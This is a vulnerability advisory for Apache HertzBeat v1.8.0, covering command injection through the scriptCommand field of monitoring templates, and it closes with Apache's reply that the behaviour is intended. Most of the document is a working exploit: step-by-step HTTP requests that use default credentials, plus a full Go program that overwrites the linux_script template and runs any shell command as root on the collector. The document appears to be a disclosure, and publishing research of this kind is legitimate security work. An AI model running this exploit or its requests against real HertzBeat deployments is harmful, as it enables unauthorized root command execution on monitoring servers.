Apache HertzBeat (v1.8.0) ScriptCollectImpl RCE

Severity: CRITICAL
Impact: Arbitrary Command Execution in Monitoring Template
CWE: CWE-78 (Improper Neutralization of Special Elements used in an OS Command)
Product: https://hertzbeat.apache.org/ (v1.8.0)
    - HertzBeat is an AI-powered Open Source Observability System
Affected Component: ScriptCollectImpl.collect()
Affected Endpoint: PUT /api/apps/define/yml
Auth Required: standard user or admin
    - For testing purposes, add a new standard user called operator with hertzbeat for the password.
    - Alternatively, use the admin user, with the default hertzbeat password.
Apache Response: Apache does not consider this a vulnerability; see Response from Apache below.

Author: Brett Gervasoni
Date: 2026-03-09


Vulnerability Summary

Hertzbeat has a design flaw that allows for arbitrary commands to be executed via the scriptCommand parameter in a template definition.

An authenticated user can overwrite any monitoring template definition via PUT /api/apps/define/yml. The define parameter of the PUT request contains raw YAML that is parsed into a Job object. When the YAML specifies protocol: script, the attacker-controlled scriptCommand string is passed directly to ProcessBuilder (bash -c "<command>") with no sanitization.

If the overwritten template has active monitoring instances, updateAppCollectJob() re-dispatches them, triggering command execution on the collector within seconds. If no instances exist, the attacker can create one via POST /api/monitor, which will cause the template to execute immediately.

The container runs as root (uid=0).

This vulnerability can be exploited by a standard user and an admin user. In the example HTTP request and exploit program, I use a new standard user I created called operator.


Vulnerable Code

Sink — ScriptCollectImpl.java:74-114 — No whitelist/blacklist, direct command execution:

public void collect(CollectRep.MetricsData.Builder builder, Metrics metrics) {
    ScriptProtocol scriptProtocol = metrics.getScript();
    // ...
    if (StringUtils.hasText(scriptProtocol.getScriptCommand())) {
        switch (scriptProtocol.getScriptTool()) {
            case BASH -> processBuilder = new ProcessBuilder(
                BASH, BASH_C, scriptProtocol.getScriptCommand().trim());  // ← PAYLOAD
            // ...
        }
    }
    // ...
    Process process = processBuilder.start();  // ← EXECUTED
}

Blocks Common Deserialization Gadget Strings — AppController.java:55-59 — Blocks SnakeYAML gadgets, not shell commands:

private static final String[] RISKY_STR_ARR = {"ScriptEngineManager", "URLClassLoader", "!!",
        "ClassLoader", "AnnotationConfigApplicationContext", "FileSystemXmlApplicationContext",
        "GenericXmlApplicationContext", "GenericGroovyApplicationContext", "GroovyScriptEngine",
        "GroovyClassLoader", "GroovyShell", "ScriptEngine", "ScriptEngineFactory",
        "XmlWebApplicationContext", "ClassPathXmlApplicationContext", "MarshalOutputStream",
        "InflaterOutputStream", "FileOutputStream"};
}

Proof of Concept — Raw HTTP Requests

Replace TARGET with the HertzBeat host. These requests use a default operator account (user role).

Step 1 — Authenticate

In this instance, I've added a new standard user with the name operator and password hertzbeat, so I'm not using an admin account.

POST /api/account/auth/form HTTP/1.1
Host: TARGET:1157
Content-Type: application/json
Content-Length: 65

{"type":1,"identifier":"operator","credential":"hertzbeat"}

Response contains data.token (JWT). Used as Bearer token below.


Step 2 — Overwrite linux_script template with malicious scriptCommand

This overwrites the built-in linux_script monitoring definition. The scriptCommand field contains the attacker's payload. Any active linux_script monitors will immediately execute it.

PUT /api/apps/define/yml HTTP/1.1
Host: TARGET:1157
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInppcC...
Content-Type: application/json

{"define":"app: linux_script\ncategory: os\nname:\n  en-US: Linux Script\n  zh-CN: Linux Script\nparams:\n  - field: host\n    name:\n      en-US: Host\n      zh-CN: Host\n    type: host\n    required: true\nmetrics:\n  - name: basic\n    i18n:\n      en-US: Basic\n      zh-CN: Basic\n    priority: 0\n    fields:\n      - field: result\n        type: 1\n        i18n:\n          en-US: Result\n          zh-CN: Result\n    protocol: script\n    script:\n      scriptTool: bash\n      charset: UTF-8\n      scriptCommand: id > /tmp/pwned\n      parseType: multiRow\n"}

Decoded define value (the YAML that gets parsed server-side):

app: linux_script
category: os
name:
  en-US: Linux Script
  zh-CN: Linux Script
params:
  - field: host
    name:
      en-US: Host
      zh-CN: Host
    type: host
    required: true
metrics:
  - name: basic
    i18n:
      en-US: Basic
      zh-CN: Basic
    priority: 0
    fields:
      - field: result
        type: 1
        i18n:
          en-US: Result
          zh-CN: Result
    protocol: script
    script:
      scriptTool: bash
      charset: UTF-8
      scriptCommand: id > /tmp/pwned
      parseType: multiRow

Expected Response:

HTTP/1.1 200 OK
Content-Type: application/json

{"code":0,"msg":null,"data":null}

At this point, if any linux_script monitors are active, the command id > /tmp/pwned executes promptly (within ~30 seconds) If no monitors exist, we need to create one.


Step 3 — Create a monitoring instance to trigger execution (if one is not already present)

Only needed if no linux_script monitors are active. Creating a new monitor instance will cause the template with our command to execute immediately.

POST /api/monitor HTTP/1.1
Host: TARGET:1157
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInppcC...
Content-Type: application/json

{"monitor":{"name":"rce-test","app":"linux_script","host":"127.0.0.1","intervals":30,"status":1},"params":[{"field":"host","paramValue":"127.0.0.1","type":1}]}

The collector immediately executes the scriptCommand from the template injected in Step 2.


Step 4 — Verify command execution

Assuming your test instance is running in docker, you can simply check like so:

docker exec hertzbeat cat /tmp/pwned

Expected output:

uid=0(root) gid=0(root) groups=0(root)

Exploit Program PoC

Sample output from the poc script.

❯ go run script_command_rce.go "id > /tmp/pwned"
============================================================
 HertzBeat ScriptCollectImpl RCE
============================================================

[*] Authenticating...
[+] Got token: eyJhbGciOiJIUzUxMiIsInppcCI6IkRFRiJ9.eJw...

[*] Overwriting linux_script template...
    PUT /api/apps/define/yml
    scriptCommand: id > /tmp/pwned
[+] Template overwritten.

[*] Creating monitor instance to trigger collection...
    POST /api/monitor with app: linux_script
[+] Monitor created.

[+] Completed. If it wasn't executed instantly, wait ~30 seconds for the collector.
[+] Command: id > /tmp/pwned

[*] Verify with (assuming its running in docker locally):
    docker exec hertzbeat <check your payload>
❯ docker exec hertzbeat cat /tmp/pwned
uid=0(root) gid=0(root) groups=0(root)

Exploit Code

Full source of script_command_rce.go:

package main

import (
	"bytes"
	"encoding/json"
	"fmt"
	"io"
	"math/rand"
	"net/http"
	"os"
	"strings"
)

const target = "http://localhost:1157"

type authResponse struct {
	Code int `json:"code"`
	Data struct {
		Token string `json:"token"`
	} `json:"data"`
}

type apiResponse struct {
	Code int    `json:"code"`
	Msg  string `json:"msg"`
}

func main() {
	if len(os.Args) < 2 {
		fmt.Fprintf(os.Stderr, "Usage: %s <command>\n", os.Args[0])
		fmt.Fprintf(os.Stderr, "Example: %s \"id > /tmp/pwned\"\n", os.Args[0])
		os.Exit(1)
	}
	cmd := strings.Join(os.Args[1:], " ")

	fmt.Println("============================================================")
	fmt.Println(" HertzBeat ScriptCollectImpl RCE")
	fmt.Println("============================================================")
	fmt.Println()

	// Authenticate as operator (using a user role that I created, you can use admin if you want)
	fmt.Println("[*] Authenticating...")

	token, err := authenticate()
	if err != nil {
		fmt.Fprintf(os.Stderr, "[-] Auth failed: %v\n", err)
		os.Exit(1)
	}

	fmt.Printf("[+] Got token: %s...\n\n", token[:40])

	// Overwrite linux_script template with malicious scriptCommand
	fmt.Println("[*] Overwriting linux_script template...")
	fmt.Printf("    PUT /api/apps/define/yml\n")
	fmt.Printf("    scriptCommand: %s\n", cmd)

	err = putMaliciousDefine(token, cmd)
	if err != nil {
		fmt.Fprintf(os.Stderr, "[-] Failed to overwrite template: %v\n", err)
		os.Exit(1)
	}

	fmt.Println("[+] Template overwritten.")
	fmt.Println()

	// Create a monitoring instance to trigger execution
	fmt.Println("[*] Creating monitor instance to trigger collection...")
	fmt.Println("    POST /api/monitor with app: linux_script")

	err = createMonitor(token)
	if err != nil {
		fmt.Fprintf(os.Stderr, "[-] Failed to create monitor: %v\n", err)
		fmt.Println("[*] This may fail if a monitor already exists — checking anyway...")
	} else {
		fmt.Println("[+] Monitor created.")
		fmt.Println()
	}

	// Completed — command will execute on next collection cycle
	fmt.Println("[+] Completed. If it wasn't executed instantly, wait ~30 seconds for the collector.")
	fmt.Printf("[+] Command: %s\n\n", cmd)
	fmt.Println("[*] Verify with (assuming its running in docker locally):")
	fmt.Println("    docker exec hertzbeat <check your payload>")
}

// authenticate logs in as a standard user role that I created called "operator"
func authenticate() (string, error) {
	body := `{"type":1,"identifier":"operator","credential":"hertzbeat"}`

	resp, err := http.Post(target+"/api/account/auth/form", "application/json", bytes.NewBufferString(body))
	if err != nil {
		return "", err
	}

	defer resp.Body.Close()

	var result authResponse
	if err := json.NewDecoder(resp.Body).Decode(&result); err != nil {
		return "", err
	}

	if result.Code != 0 || result.Data.Token == "" {
		return "", fmt.Errorf("unexpected response code %d", result.Code)
	}

	return result.Data.Token, nil
}

// putMaliciousDefine overwrites the linux_script app definition with a
// script-protocol template containing the attacker's command.
func putMaliciousDefine(token, command string) error {
	define := fmt.Sprintf(`app: linux_script
category: os
name:
  en-US: Linux Script
  zh-CN: Linux Script
params:
  - field: host
    name:
      en-US: Host
      zh-CN: Host
    type: host
    required: true
metrics:
  - name: basic
    i18n:
      en-US: Basic
      zh-CN: Basic
    priority: 0
    fields:
      - field: result
        type: 1
        i18n:
          en-US: Result
          zh-CN: Result
    protocol: script
    script:
      scriptTool: bash
      charset: UTF-8
      scriptCommand: "%s && echo result done"
      parseType: multiRow
`, command)

	payload, _ := json.Marshal(map[string]string{"define": define})

	req, _ := http.NewRequest("PUT", target+"/api/apps/define/yml", bytes.NewBuffer(payload))
	req.Header.Set("Content-Type", "application/json")
	req.Header.Set("Authorization", "Bearer "+token)

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return err
	}

	defer resp.Body.Close()

	respBody, _ := io.ReadAll(resp.Body)

	var result apiResponse
	if err := json.Unmarshal(respBody, &result); err != nil {
		return fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(respBody))
	}

	if result.Code != 0 {
		return fmt.Errorf("API error (code %d): %s", result.Code, result.Msg)
	}

	return nil
}

// createMonitor creates a linux_script monitoring instance pointed at localhost.
// Uses a random suffix so the name is unique on repeated runs.
func createMonitor(token string) error {
	suffix := randSuffix()
	name := fmt.Sprintf("rce-poc-%s", suffix) // creating a unique suffix, so the command is executed instantly, instead of potentially waiting.
	body := fmt.Sprintf(`{"monitor":{"name":"%s","app":"linux_script","host":"127.0.0.1","intervals":30,"status":1},"params":[{"field":"host","paramValue":"127.0.0.1","type":1}]}`, name)

	req, _ := http.NewRequest("POST", target+"/api/monitor", bytes.NewBufferString(body))
	req.Header.Set("Content-Type", "application/json")
	req.Header.Set("Authorization", "Bearer "+token)

	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return err
	}

	defer resp.Body.Close()

	respBody, _ := io.ReadAll(resp.Body)
	var result apiResponse
	if err := json.Unmarshal(respBody, &result); err != nil {
		return fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(respBody))
	}

	if result.Code != 0 {
		return fmt.Errorf("API error (code %d): %s", result.Code, result.Msg)
	}
	return nil
}

func randSuffix() string {
	const chars = "abcdefghijklmnopqrstuvwxyz0123456789"
	b := make([]byte, 8)

	for i := range b {
		b[i] = chars[rand.Intn(len(chars))]
	}

	return string(b)
}

Notes


Response from Apache

Official response from Apache Security Team:

As documented in HertzBeat's security model at https://hertzbeat.apache.org/docs/help/security_model, this is expected, intended functionality: it is up to the operator to make sure only trusted users are given access to HertzBeat. Customization is a feature, and users are responsible for their own custom templates. It's expected that any authenticated user is trusted with admin capabilities.

The permission model in HertzBeat has not been finished yet, though the product has shipped. See the HertzBeat Security Model documentation for details.

This is what Apache had to say about role-based permissions:

Please note that the role permission function is being improved, please do not use roles to control user permissions, all users have management permissions

Reporting Timeline